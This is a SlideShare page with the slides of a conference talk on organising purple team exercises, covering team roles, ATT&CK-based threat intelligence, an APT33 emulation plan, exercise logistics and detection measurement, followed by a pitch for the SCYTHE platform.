Jorge Orchilles, profile picture
Uploaded byJorge Orchilles
PDF, PPTX2,537 views

Purple Team Exercises - GRIMMCon

The document outlines the preparation and execution of purple team exercises, focusing on the collaboration between red and blue teams to enhance an organization's cybersecurity posture. It details roles, methodologies, threat intelligence, and logistics involved in conducting these exercises effectively. Key objectives include emulating adversarial behavior, measuring defenses, and improving detection and response capabilities within organizations.

Embed presentation

Download as PDF, PPTX
@JORGEORCHILLES Purple Team Exercises GRIMMCon @JorgeOrchilles
@JORGEORCHILLES T1033 - System Owner/User Discovery ● Chief Technology Officer - SCYTHE ● C2 Matrix Co-Creator ● 10 years @ Citi leading offensive security team ● Certified SANS Instructor: SEC560, SEC504 ● Author SEC564: Red Team Exercises and Adversary Emulation ● CVSSv3.1 Working Group Voting Member ● GFMA: Threat-Led Pen Test Framework ● ISSA Fellow; NSI Technologist Fellow 2
@JORGEORCHILLES Purple… how hard can it be? 3
@JORGEORCHILLES Red and Blue just work together... 4
@JORGEORCHILLES How we think it will go 5
@JORGEORCHILLES How it may go 6
@JORGEORCHILLES Agenda ● Ethical Hacking Evolution ● Goals ● Sponsors and Roles ● Framework/Methodology ● Cyber Threat Intelligence ● Attack Infrastructure ● Team Prep ● Kick Off ● Exercise Flow ● Wrap Up 7
@JORGEORCHILLES Ethical Hacking Evolution ● Common Vulnerability and Exposures != Tactics, Techniques, and Procedures ● Mature organizations operate under “Assume Breach” ○ Some vulnerability will not be patched before it is exploited ○ Some user will fall for social engineering and execute payload or provide credentials ○ What do we do then? ● Testing technology is not enough: People, Process, and Technology 8
@JORGEORCHILLES Red Team ● Definition: ○ Test Assumptions ○ Emulate Tactics, Techniques, and Procedures (TTPs) to test people, processes, and technology ● Goal: ○ Make Blue Team better ○ Train and measure whether blue teams' detection and response policies, procedures, and technologies are effective 9 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Effort: ○ Manual ● Frequency: ○ Intelligence-led (new exploit, tool, or TTP) ● Customer: ○ Blue Teams “The practice of looking at a problem or situation from the perspective of an adversary” – Red Team Journal 1997
@JORGEORCHILLES Red Teams Internal Red Teams ● Repeated engagements ○ Keep finding the same thing ○ Remediation retesting ● Use privileged/insider knowledge ● Sparring partner External Red Team ● Offers new perspective ○ May have other industry experience ● “Snapshot” engagements ○ Generate report based on limited window 10
@JORGEORCHILLES Adversary Emulation ● Definition: ○ A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries ○ May be non-blind a.k.a Purple Team ● Goal: ○ Emulate an adversary attack chain or scenario ● Effort: ○ Manual; SCYTHE is changing that ● Customer: ○ Entire organization 11 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
@JORGEORCHILLES TOWARD A PURPLE TEAM
@JORGEORCHILLES Purple Team Exercises 13 ● Virtual, functional team where teams work together to measure and improve defensive security posture ○ CTI provides threat actor with capability, intent, and opportunity to attack ○ Red Team creates adversary emulation plan ○ Tabletop discussion with defenders about the attacker tactics, techniques, and procedures (TTPs) and expected defenses ○ Emulation of each adversary behavior (TTP) ○ Blue Team look for indicators of behavior ○ Red and Blue work together to create remediation action plan ● Repeat exercises to measure and improve people, process, and technology
@JORGEORCHILLES Purple Team Goals ● Emulate an attack against a target organization ● Obtain a holistic view of target organization ● Measure people, process, and technology ● When to do In Person Purple Team? ○ Prior to a blind Adversary Emulation ○ After a blind Adversary Emulation as “Replay” ○ To train new team members ○ Periodic training for certain operational locations ○ To chain TTPs (Attack Patterns) that have previously been documented ● Operationalize Purple Team ○ Test new TTPs based on Threat Intelligence 14
@JORGEORCHILLES Sponsors ● Approve ○ Exercise ○ Scope ○ Budget ● Members of various teams out of BAU ○ Cyber Threat Intelligence ○ Red Team ○ SOC ○ Hunt Team ○ Incident Response ○ Forensics 15
@JORGEORCHILLES Time Requirements ● Purple Team Exercises can run for 1-5 days of mostly hands on keyboard work between Red Team and Blue Teams ● Preparation time is based on the defined goals, guidance or constraints set by Sponsors, and emulated adversary’s TTPs 16 Preparation Exercise Action Items 1-4 Weeks 1-5 Days Undefined
@JORGEORCHILLES Roles and Responsibilities Title Role Responsibility CISO/Head of Information Security Sponsor Approve Exercise and Budget Red Team Manager Sponsor & Attendee Define Goals, Select Attendees, Select TTPs SOC Manager Sponsor & Attendee Define Goals, Select Attendees, Select TTPs Incident Response Manager Sponsor Define Goals, Select Attendees, Select TTPs CTI Analyst Sponsor Define Goals, Select TTPs Participants Attendees Prepare, Attend, Action Items Exercise Coordinator 1-2 Operational Managers that lead Preparation Phase activities, participate in or observe the exercise, and responsible for the Lessons Learned document. Record minutes, notes, action items, and feedback. Send daily emails with those notes as well as plan for the next day.
@JORGEORCHILLES Framework & Methodology 18 ● Cyber Kill Chain – Lockheed Martin ● Unified Cyber Kill Chain – Paul Pols ● Financial/Regulatory Frameworks ○ CBEST Intelligence Led Testing ○ Threat Intelligence-Based Ethical Red Teaming ○ Red Team: Adversarial Attack Simulation Exercises ○ Intelligence-led Cyber Attack Simulation Testing ○ A Framework for the Regulatory Use of Penetration Testing in the Financial Services Industry ● Testing Framework:
@JORGEORCHILLES MITRE ATT&CK https://attack.mitre.org/ 19
@JORGEORCHILLES Threat Intelligence 20 David Bianco: http://detect-respond.blogspot.com/2013/03/the-pyramid-of-pain.html
@JORGEORCHILLES Threat Intelligence 21 S0129 – AutoIT T1068 – Exploitation for Privilege Escalation S0194 - PowerSploit T1003 - Credential Dumping IP Address S0002 - Mimikatz S0192 - Pupy Hash Value T1086 - Powershell
@JORGEORCHILLES ATT&CK Navigator 22
@JORGEORCHILLES #ThreatThursday ● Weekly Adversary ○ Introduce Adversary ○ Consume CTI and map to MITRE ATT&CK ○ Present Adversary Emulation Plan ○ Share the plan on SCYTHE Community Threat Github: ■ https://github.com/scythe-io/community-threats/ ○ Emulate Adversary ○ How to defend against adversary ● All updated here: https://www.scythe.io/threatthursday 23
@JORGEORCHILLES All about the TTPs ● Planning is extremely important ● Choose TTPs that are: ○ Not prevented ○ Logged ○ Detected ○ Alerted ● Focus is on improving people and process 24
@JORGEORCHILLES Tabletop TTPs with Managers ● Identify controls expected for those TTPs and which teams should have visibility of TTP activity ● Create table showing expected outcomes per team: 25 Procedure Technique Tactic Detection SOC Hunt IR <TTP1> <Technique1> <Tactic1> <Control1> x x x <TTP2> <Technique2> <Tactic2> <Control2> x x <TTP3> <Technique3> <Tactic3> <Control3> x x <TTP4> <Technique4> <Tactic4> <Control4> x x
@JORGEORCHILLES Determine Tools to Use - C2 Matrix ● Google Sheet of C2s ● https://www.thec2matrix.com/ ● Find ideal C2 for your needs ● https://howto.thec2matrix.com ● SANS Slingshot C2 Matrix VM ● @C2_Matrix 26
@JORGEORCHILLES Create Adversary Emulation Plan 27
@JORGEORCHILLES APT33 28 Tactic Description Description APT33 is a suspected Iranian threat group that has carried out operations since at least 2013. The group has targeted organizations in the United States, Saudi Arabia, and South Korea, in multiple industries including governments, research, chemical, engineering, manufacturing, consulting, finance, telecoms, and several other sectors. Objective Establishing persistent access to partners and suppliers of targets. Mounting supply chain attacks Command and Control T1043 - Commonly Used Port: Port 80 and 443; T1071 - Standard Application Layer Protocol: HTTP and HTTPS; T1032 - Standard Cryptographic Protocol T1065 - Uncommonly Used Port: Ports 808 and 880 Initial Access T1192 – Spear phishing Link; T1110 - Brute Force; T1078 - Valid Accounts Execution T1204 - User Execution; T1203 - Exploitation for Client Execution Defense Evasion T1132 - Data Encoding; T1480 - Execution Guardrails: Kill dates in payload; T1027 - Obfuscated Files or Information; T1086 – PowerShell Discovery T1040 - Network Sniffing Privilege Escalation T1068 - Exploitation for Privilege Escalation Persistence T1060 - Registry Run Keys / Startup Folder; T1053 - Scheduled Task Credential Access T1003 - Credential Dumping: Publicly available tools like Mimikatz Exfiltration T1002 - Data Compressed; T1048 - Exfiltration Over Alternative Protocol https://www.scythe.io/library/threatthursday-apt33
@JORGEORCHILLES Logistics 29 ● Pick a location ● Virtual or Remote? ○ Virtual: Choose a Platform (Zoom, GoToMeeting, etc) ○ For physical locations: SOC locations are ideal as SOC Analysts, Hunt Team, and Incident Response are generally physically present ■ Obtain travel approval from sponsors ■ Plan to arrive a day early ■ Training room or large conference room ● Each attendee should have workstation with media output or screen sharing to show current screen to other participants
@JORGEORCHILLES Target Systems Provision production systems for exercise that represent the organization ● Endpoint Operation Systems ○ Windows 7 through 10 – multiple hosts ○ Terminal Services/Citrix ● Server Operating Systems ○ Windows Servers ○ *nix Servers ● Consider physical, virtual, VDI and cloud servers 30
@JORGEORCHILLES Security Tools Request the target systems have production security tools: ● Anti-Virus/Anti-Malware ● Anti-Exploit ● Endpoint Detection & Response ● Forensic Tools ○ Image acquisition ○ Live forensics 31
@JORGEORCHILLES Target Accounts Service or secondary accounts should be created for logging into systems, accessing Internet, receiving email, and to ensure real production credentials are not compromised ● Request secondary account of a standard user ● Request Standard Email Access ● Request Internet Access ● Add accounts as local administrator of some target systems 32
@JORGEORCHILLES Attack Infrastructure ● Choose and procure external hosting provider ● Create internal and Internet virtual machines ○ Only allow connection from organization proxies and Red Team IP addresses ○ Obtain and add external IP address of External Line of location of event ○ Build Credential theft site or Payload delivery sites ○ Setup C2 Infrastructure – based on payloads and TTPs ● Ensure SMTP servers allow sending emails into organization ● Purchase Domains and TLS Certificates ● Provide IP addresses and Domains to SOC for allowing access ● Ensure systems are allowed on any Network Access Controls 33
@JORGEORCHILLES Red Team Preparation ● Setup at least 2 laptops to show the attack activity live ● Ensure Attack Infrastructure is fully functional ● Ensure Target Systems are fully functional ● Document all commands required to emulate TTPs (Adversary Emulation Manual) ● Setup resource scripts/framework equivalent to generate payloads and setup handlers ● Test TTPs before exercise on different hosts than the exercise hosts but that are configured alike 34
@JORGEORCHILLES Use VECTR 35
@JORGEORCHILLES SOC/Hunt Team Preparation ● Validate security tools are reporting to SOC production tools from the target systems ● Ensure C2 allowlist of the Red Team domains ● Ensure TLS decryption for the Red Team domains ● Verify allow-list ● Work with Red Team during testing of payloads and C2 prior to exercise ● Ensure laptop or workstations have access to all tools for showing on large screen in exercise location 36
@JORGEORCHILLES Incident Response Preparation ● Create an IR case/id ○ This will allow tagging artifacts and following normal processes without flagging any suspicious activity e.g. pulling memory from a system that does not have a formal case ● Ensure the correct forensic tools are deployed on the target systems ● Consider anyway to speed up BAU process ● Install Live Forensic Tools for efficiency ○ Sysmon ○ Processmon 37
@JORGEORCHILLES Kick Off the Exercise ● Sponsor kicks off the exercise ● Motivate the attendees ● Go over the flow of the exercise 38
@JORGEORCHILLES Exercise Flow 1. Red Team presents the TTP and technical details ○ Attack Vector ○ Delivery Method ○ User Interaction ○ Privilege gained ○ Tool or exploit used 2. Purple Team discussion of controls based on delivery method ○ SOC: Any logs or alerts for this TTP ○ Hunt Team: Any Hunt Cases for this TTP ○ Incident Response: Documented methods to identify if TTP was leveraged 39
@JORGEORCHILLES Exercise Flow 3. Red Team executes the TTP ○ Provides attacker IP address ○ Provides target ○ Provides exact time ○ Shows the attack on projector 4. SOC, Hunt, and IR follow process to identify evidence of TTP ○ Time must be monitored to meet expectation and move exercise along 40
@JORGEORCHILLES Measure Detection Maturity 0. Emulation does not generate events 1. Emulation generates events locally 2. Emulation generates events centrally (no alert) 3. Emulation triggers an alert 4. Emulation triggers the response process 41 Shout out to @mvelazco for above See his DerbyCon Talk “I sim(ulate), therefore I catch”
@JORGEORCHILLES 42
@JORGEORCHILLES Exercise Flow 5. Show on screen if TTP was identified, received logs, alert, or forensic data a. Time to detect and/or time to receive alert b. Red Team stops TTP 6. Document what worked and what did not 7. Is there any short term adjustments that can increase visibility? a. Implement adjustment b. Red Team re-runs TTP 8. Document any Action Items 9. Repeat flow for the next TTP 43
@JORGEORCHILLES Exercise Closure ● At least one dedicated Exercise Coordinator should be on assigned to take minutes, notes, action items, and feedback ● Daily emails should be sent to all attendees and sponsors with minutes, action items, and plan for the next day ● The Exercise Coordinator is responsible for the creation of a Lessons Learned document following each exercise ● A feedback request should be sent to all attendees on the last day of the Purple Team Exercise to obtain immediate feedback, while it is fresh on attendee’s minds ● Lessons Learned documents should be completed and sent to Sponsors and Attendees less than 30 days after the exercise has concluded 44
@JORGEORCHILLES UniCon August 20 45 https://zoom.us/webinar/register/3815947366418/WN_b4Bm9E5BSi2rhACLwiaJGw Save the Date!!!
@JORGEORCHILLES@JORGEORCHILLES Thank you! Questions? 46
@JORGEORCHILLES What is SCYTHE? ● Enterprise-Grade platform for Adversary Emulation ○ Creating custom, controlled, synthetic malware ○ Can be deployed on-premises or your cloud ● Emulate known threat actors against an enterprise network ○ Consistently execute adversary behaviors ○ Continually assess security controls ○ Decreased evaluation time of security technologies ○ Identify blind spots for blue teams ○ Force-multiplier for red team resources ○ Measure and improve response of people and process 47
@JORGEORCHILLES Features & Capabilities ● Trivial installation ● Enterprise C2 ○ HTTP(S), DNS, SMB ○ Google, Twitter, Stego ● Automation ○ Build cross-platform synthetic malware via dashboard ○ Synthetic malware emulates chosen behaviors consistently ● Delivery methods ○ Web Page/ Drive-by (T1189) ○ Phishing Link (T1192) ○ Phishing Attachment (T1193) ● Reports ○ HTML Report, CSV Report, Executive Report and Technical Report ○ Mapped to MITRE ATT&CK ● Integrations ○ PlexTrac - automated report writing and handling ○ Integrated with SIEMs (Splunk and Syslog) ○ Red Canary’s Atomic Red Team test cases ○ RedELK and VECTR integration in progress 48
@JORGEORCHILLES Architecture 49
@JORGEORCHILLES What’s Next? ● SCYTHE v3 Released July 7, 2020 ○ Virtual File System ○ Threat Automation language ■ Structured Data out of Unstructured Data ■ Use results of one action for the next action ● Module SDK ○ Python and Native ○ In-memory loading techniques ● Marketplace ○ Ecosystem of third party contributors ○ Create custom modules ○ Request custom modules - TTP Bounty 50

More Related Content

PDF
Purple Team Exercise Framework Workshop #PTEF
byJorge Orchilles
 
PDF
Purple Team Exercise Hands-On Workshop #GrayHat
byJorge Orchilles
 
PDF
Adversary Emulation and Red Team Exercises - EDUCAUSE
byJorge Orchilles
 
PDF
How to Plan Purple Team Exercises
byHaydn Johnson
 
PDF
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
byJorge Orchilles
 
PPTX
ATT&CKing with Threat Intelligence
byChristopher Korban
 
PPTX
Purple Teaming with ATT&CK - x33fcon 2018
byChristopher Korban
 
PPTX
Putting MITRE ATT&CK into Action with What You Have, Where You Are
byKatie Nickels
 
Purple Team Exercise Framework Workshop #PTEF
byJorge Orchilles
 
Purple Team Exercise Hands-On Workshop #GrayHat
byJorge Orchilles
 
Adversary Emulation and Red Team Exercises - EDUCAUSE
byJorge Orchilles
 
How to Plan Purple Team Exercises
byHaydn Johnson
 
Managing & Showing Value during Red Team Engagements & Purple Team Exercises ...
byJorge Orchilles
 
ATT&CKing with Threat Intelligence
byChristopher Korban
 
Purple Teaming with ATT&CK - x33fcon 2018
byChristopher Korban
 
Putting MITRE ATT&CK into Action with What You Have, Where You Are
byKatie Nickels
 

What's hot

PDF
8.8 Las Vegas - Adversary Emulation con C2 Matrix
byJorge Orchilles
 
PPTX
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
byJorge Orchilles
 
PDF
Red Team Framework
by👀 Joe Gray
 
PDF
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
byMITRE - ATT&CKcon
 
PDF
So you want to be a red teamer
byJorge Orchilles
 
PDF
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
byMITRE ATT&CK
 
PPTX
Adversary Emulation and the C2 Matrix
byJorge Orchilles
 
PPTX
Red team Engagement
byIndranil Banerjee
 
PDF
Introduction to red team operations
bySunny Neo
 
PDF
Introduction to MITRE ATT&CK
byArpan Raval
 
PDF
Threat-Based Adversary Emulation with MITRE ATT&CK
byKatie Nickels
 
PPTX
Red team and blue team in ethical hacking
byVikram Khanna
 
PDF
Threat Hunting with Splunk Hands-on
bySplunk
 
PDF
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
PDF
The Rise of the Purple Team
byPriyanka Aash
 
PDF
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
byMITRE ATT&CK
 
PDF
MITRE ATT&CK Framework
byn|u - The Open Security Community
 
PDF
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
byMITRE - ATT&CKcon
 
PDF
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
byKatie Nickels
 
PDF
Cyber threat intelligence ppt
byKumar Gaurav
 
8.8 Las Vegas - Adversary Emulation con C2 Matrix
byJorge Orchilles
 
Purple Team - Work it out: Organizing Effective Adversary Emulation Exercises
byJorge Orchilles
 
Red Team Framework
by👀 Joe Gray
 
MITRE ATT&CKcon 2018: Hunters ATT&CKing with the Data, Roberto Rodriguez, Spe...
byMITRE - ATT&CKcon
 
So you want to be a red teamer
byJorge Orchilles
 
What is ATT&CK coverage, anyway? Breadth and depth analysis with Atomic Red Team
byMITRE ATT&CK
 
Adversary Emulation and the C2 Matrix
byJorge Orchilles
 
Red team Engagement
byIndranil Banerjee
 
Introduction to red team operations
bySunny Neo
 
Introduction to MITRE ATT&CK
byArpan Raval
 
Threat-Based Adversary Emulation with MITRE ATT&CK
byKatie Nickels
 
Red team and blue team in ethical hacking
byVikram Khanna
 
Threat Hunting with Splunk Hands-on
bySplunk
 
PHDays 2018 Threat Hunting Hands-On Lab
byTeymur Kheirkhabarov
 
The Rise of the Purple Team
byPriyanka Aash
 
Mapping to MITRE ATT&CK: Enhancing Operations Through the Tracking of Interac...
byMITRE ATT&CK
 
MITRE ATT&CK Framework
byn|u - The Open Security Community
 
MITRE ATT&CKcon 2.0: Using Threat Intelligence to Focus ATT&CK Activities; Da...
byMITRE - ATT&CKcon
 
FIRST CTI Symposium: Turning intelligence into action with MITRE ATT&CK™
byKatie Nickels
 
Cyber threat intelligence ppt
byKumar Gaurav
 

Similar to Purple Team Exercises - GRIMMCon

PDF
Purple Team Exercise Workshop December 2020
byJorge Orchilles
 
PDF
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
byJorge Orchilles
 
PDF
Purple Team Use Case - Security Weekly
byJorge Orchilles
 
PDF
Cuddling the Cozy Bear Emulating APT29
byJorge Orchilles
 
PDF
Adversary Emulation Workshop
byprithaaash
 
PDF
SCYTHE Purple Team Workshop with Tim Schulz
byJorge Orchilles
 
PPTX
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
byJoe Vest
 
PDF
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
byChris Gates
 
PDF
NVISO - A Journey Through Adversary Emulation - Jonas Bauters
byNVISO
 
PPTX
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
byJorge Orchilles
 
PPTX
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
byJorge Orchilles
 
PPTX
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
byJorge Orchilles
 
PPTX
Ethical Hacking - Red Team vs Blue Team.pptx
byofficialstanish
 
DOCX
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
byShakas Technologies
 
PDF
Evolution of Offensive Assessments - SecureWV Conference
byJorge Orchilles
 
PDF
External Threat Hunters are Red Teamers
byJorge Orchilles
 
PDF
Evolution of Offensive Assessments - RootCon
byJorge Orchilles
 
PDF
Adversary Emulation - Red Team Village - Mayhem 2020
byJorge Orchilles
 
PDF
KringleCon 3 Providing Value in Offensive Security
byJorge Orchilles
 
PPTX
Adversary Emulation - DerpCon
byJorge Orchilles
 
Purple Team Exercise Workshop December 2020
byJorge Orchilles
 
DEFCON Safe Mode - Red Team Village - Emulating Evil Corp and WastedLocker
byJorge Orchilles
 
Purple Team Use Case - Security Weekly
byJorge Orchilles
 
Cuddling the Cozy Bear Emulating APT29
byJorge Orchilles
 
Adversary Emulation Workshop
byprithaaash
 
SCYTHE Purple Team Workshop with Tim Schulz
byJorge Orchilles
 
Using IOCs to Design and Control Threat Activities During a Red Team Engagement
byJoe Vest
 
Building a Successful Internal Adversarial Simulation Team - Chris Gates & Ch...
byChris Gates
 
NVISO - A Journey Through Adversary Emulation - Jonas Bauters
byNVISO
 
Ethical Hacking Definitions Matter - Covering Vulnerability Scanning, Vulnera...
byJorge Orchilles
 
Adversarial Emulation and the C2 Matrix - Presented at Wild West Hackin Fest ...
byJorge Orchilles
 
Adversarial Emulation with the C2 Matrix - Wild West WebCastin Fest
byJorge Orchilles
 
Ethical Hacking - Red Team vs Blue Team.pptx
byofficialstanish
 
Toward Effective Evaluation of Cyber Defense Threat Based Adversary Emulation...
byShakas Technologies
 
Evolution of Offensive Assessments - SecureWV Conference
byJorge Orchilles
 
External Threat Hunters are Red Teamers
byJorge Orchilles
 
Evolution of Offensive Assessments - RootCon
byJorge Orchilles
 
Adversary Emulation - Red Team Village - Mayhem 2020
byJorge Orchilles
 
KringleCon 3 Providing Value in Offensive Security
byJorge Orchilles
 
Adversary Emulation - DerpCon
byJorge Orchilles
 

More from Jorge Orchilles

PPTX
C2 Matrix A Comparison of Command and Control Frameworks
byJorge Orchilles
 
PDF
C2 Matrix Anniversary - Blackhat EU 2020
byJorge Orchilles
 
PDF
Blackhat 2020 Arsenal - C2 Matrix
byJorge Orchilles
 
PPTX
Windows Phone 8 Security and Testing WP8 Apps
byJorge Orchilles
 
PPTX
BackTrack 4 R2 - SFISSA Presentation
byJorge Orchilles
 
PPTX
Windows 7 Security
byJorge Orchilles
 
PPTX
Emerging Threats to Infrastructure
byJorge Orchilles
 
KEY
Vulnerability Ass... Penetrate What?
byJorge Orchilles
 
C2 Matrix A Comparison of Command and Control Frameworks
byJorge Orchilles
 
C2 Matrix Anniversary - Blackhat EU 2020
byJorge Orchilles
 
Blackhat 2020 Arsenal - C2 Matrix
byJorge Orchilles
 
Windows Phone 8 Security and Testing WP8 Apps
byJorge Orchilles
 
BackTrack 4 R2 - SFISSA Presentation
byJorge Orchilles
 
Windows 7 Security
byJorge Orchilles
 
Emerging Threats to Infrastructure
byJorge Orchilles
 
Vulnerability Ass... Penetrate What?
byJorge Orchilles
 

Recently uploaded

DOCX
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
PPTX
Why Most GenAI Projects Fail to Scale and How to Become One of the Success St...
byEarley Information Science
 
PDF
DevFest El Jadida 2025 - Product Thinking
byElmehdi AMLOU
 
PPTX
UiPath Autonomous Agents | Building and Orchestrating Agents End-to-End
byUiPathCommunity
 
PDF
Access Control 2025: From Security Silo to Software-Defined Ecosystem
byMemoori
 
PDF
Real-Time Data Insight Using Microsoft Forms for Business
byElevate
 
PDF
10 Things AI-First Apps Do Differently by iProgrammer Solutions
byiProgrammer Solutions Private Limited
 
PPTX
DYNAMICALLY.pptx good for the teachers or students to do seminars and for tea...
bympoorvika031
 
PDF
Session 1 - Solving Semi-Structured Documents with Document Understanding
byDianaGray10
 
PDF
Cybersecurity: Safeguarding Digital Assets
byYasir Naveed Riaz
 
PDF
December Patch Tuesday
byIvanti
 
PDF
API-First Architecture in Financial Systems
bycyy111112
 
PPTX
AI in Cybersecurity: Digital Defense by Yasir Naveed Riaz
byYasir Naveed Riaz
 
PPTX
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
PDF
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
PDF
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
PPTX
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
PPTX
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
PDF
Decoding the DNA: The Digital Networks Act, the Open Internet, and IP interco...
byCSUC - Consorci de Serveis Universitaris de Catalunya
 
PDF
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 
iRobot Post‑Mortem and Alternative Paths - Discussion Document for Boards and...
byDave Litwiller
 
Why Most GenAI Projects Fail to Scale and How to Become One of the Success St...
byEarley Information Science
 
DevFest El Jadida 2025 - Product Thinking
byElmehdi AMLOU
 
UiPath Autonomous Agents | Building and Orchestrating Agents End-to-End
byUiPathCommunity
 
Access Control 2025: From Security Silo to Software-Defined Ecosystem
byMemoori
 
Real-Time Data Insight Using Microsoft Forms for Business
byElevate
 
10 Things AI-First Apps Do Differently by iProgrammer Solutions
byiProgrammer Solutions Private Limited
 
DYNAMICALLY.pptx good for the teachers or students to do seminars and for tea...
bympoorvika031
 
Session 1 - Solving Semi-Structured Documents with Document Understanding
byDianaGray10
 
Cybersecurity: Safeguarding Digital Assets
byYasir Naveed Riaz
 
December Patch Tuesday
byIvanti
 
API-First Architecture in Financial Systems
bycyy111112
 
AI in Cybersecurity: Digital Defense by Yasir Naveed Riaz
byYasir Naveed Riaz
 
Technology Consulting _ by Slidesgo.pptx
byfh82277
 
Dev Dives: AI that builds with you - UiPath Autopilot for effortless RPA & AP...
byUiPathCommunity
 
The major tech developments for 2026 by Pluralsight, a research and training ...
byChris Skinner
 
Software Analysis &Design ethiopia chap-2.pptx
byAbbas484771
 
Protecting Data in an AI Driven World - Cybersecurity in 2026
byYasir Naveed Riaz
 
Decoding the DNA: The Digital Networks Act, the Open Internet, and IP interco...
byCSUC - Consorci de Serveis Universitaris de Catalunya
 
Day 3 - Data and Application Security - 2nd Sight Lab Cloud Security Class
by2nd Sight Lab
 

Purple Team Exercises - GRIMMCon

  • 1.
  • 2.
    @JORGEORCHILLES T1033 - SystemOwner/User Discovery ● Chief Technology Officer - SCYTHE ● C2 Matrix Co-Creator ● 10 years @ Citi leading offensive security team ● Certified SANS Instructor: SEC560, SEC504 ● Author SEC564: Red Team Exercises and Adversary Emulation ● CVSSv3.1 Working Group Voting Member ● GFMA: Threat-Led Pen Test Framework ● ISSA Fellow; NSI Technologist Fellow 2
  • 3.
  • 4.
    @JORGEORCHILLES Red and Bluejust work together... 4
  • 5.
  • 6.
  • 7.
    @JORGEORCHILLES Agenda ● Ethical HackingEvolution ● Goals ● Sponsors and Roles ● Framework/Methodology ● Cyber Threat Intelligence ● Attack Infrastructure ● Team Prep ● Kick Off ● Exercise Flow ● Wrap Up 7
  • 8.
    @JORGEORCHILLES Ethical Hacking Evolution ●Common Vulnerability and Exposures != Tactics, Techniques, and Procedures ● Mature organizations operate under “Assume Breach” ○ Some vulnerability will not be patched before it is exploited ○ Some user will fall for social engineering and execute payload or provide credentials ○ What do we do then? ● Testing technology is not enough: People, Process, and Technology 8
  • 9.
    @JORGEORCHILLES Red Team ● Definition: ○Test Assumptions ○ Emulate Tactics, Techniques, and Procedures (TTPs) to test people, processes, and technology ● Goal: ○ Make Blue Team better ○ Train and measure whether blue teams' detection and response policies, procedures, and technologies are effective 9 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988 ● Effort: ○ Manual ● Frequency: ○ Intelligence-led (new exploit, tool, or TTP) ● Customer: ○ Blue Teams “The practice of looking at a problem or situation from the perspective of an adversary” – Red Team Journal 1997
  • 10.
    @JORGEORCHILLES Red Teams Internal RedTeams ● Repeated engagements ○ Keep finding the same thing ○ Remediation retesting ● Use privileged/insider knowledge ● Sparring partner External Red Team ● Offers new perspective ○ May have other industry experience ● “Snapshot” engagements ○ Generate report based on limited window 10
  • 11.
    @JORGEORCHILLES Adversary Emulation ● Definition: ○A type of Red Team exercise where the Red Team emulates how an adversary operates, following the same tactics, techniques, and procedures (TTPs), with a specific objective similar to those of realistic threats or adversaries ○ May be non-blind a.k.a Purple Team ● Goal: ○ Emulate an adversary attack chain or scenario ● Effort: ○ Manual; SCYTHE is changing that ● Customer: ○ Entire organization 11 https://medium.com/@jorgeorchilles/ethical-hacking-definitions-9b9a6dad4988
  • 12.
  • 13.
    @JORGEORCHILLES Purple Team Exercises 13 ●Virtual, functional team where teams work together to measure and improve defensive security posture ○ CTI provides threat actor with capability, intent, and opportunity to attack ○ Red Team creates adversary emulation plan ○ Tabletop discussion with defenders about the attacker tactics, techniques, and procedures (TTPs) and expected defenses ○ Emulation of each adversary behavior (TTP) ○ Blue Team look for indicators of behavior ○ Red and Blue work together to create remediation action plan ● Repeat exercises to measure and improve people, process, and technology
  • 14.
    @JORGEORCHILLES Purple Team Goals ●Emulate an attack against a target organization ● Obtain a holistic view of target organization ● Measure people, process, and technology ● When to do In Person Purple Team? ○ Prior to a blind Adversary Emulation ○ After a blind Adversary Emulation as “Replay” ○ To train new team members ○ Periodic training for certain operational locations ○ To chain TTPs (Attack Patterns) that have previously been documented ● Operationalize Purple Team ○ Test new TTPs based on Threat Intelligence 14
  • 15.
    @JORGEORCHILLES Sponsors ● Approve ○ Exercise ○Scope ○ Budget ● Members of various teams out of BAU ○ Cyber Threat Intelligence ○ Red Team ○ SOC ○ Hunt Team ○ Incident Response ○ Forensics 15
  • 16.
    @JORGEORCHILLES Time Requirements ● PurpleTeam Exercises can run for 1-5 days of mostly hands on keyboard work between Red Team and Blue Teams ● Preparation time is based on the defined goals, guidance or constraints set by Sponsors, and emulated adversary’s TTPs 16 Preparation Exercise Action Items 1-4 Weeks 1-5 Days Undefined
  • 17.
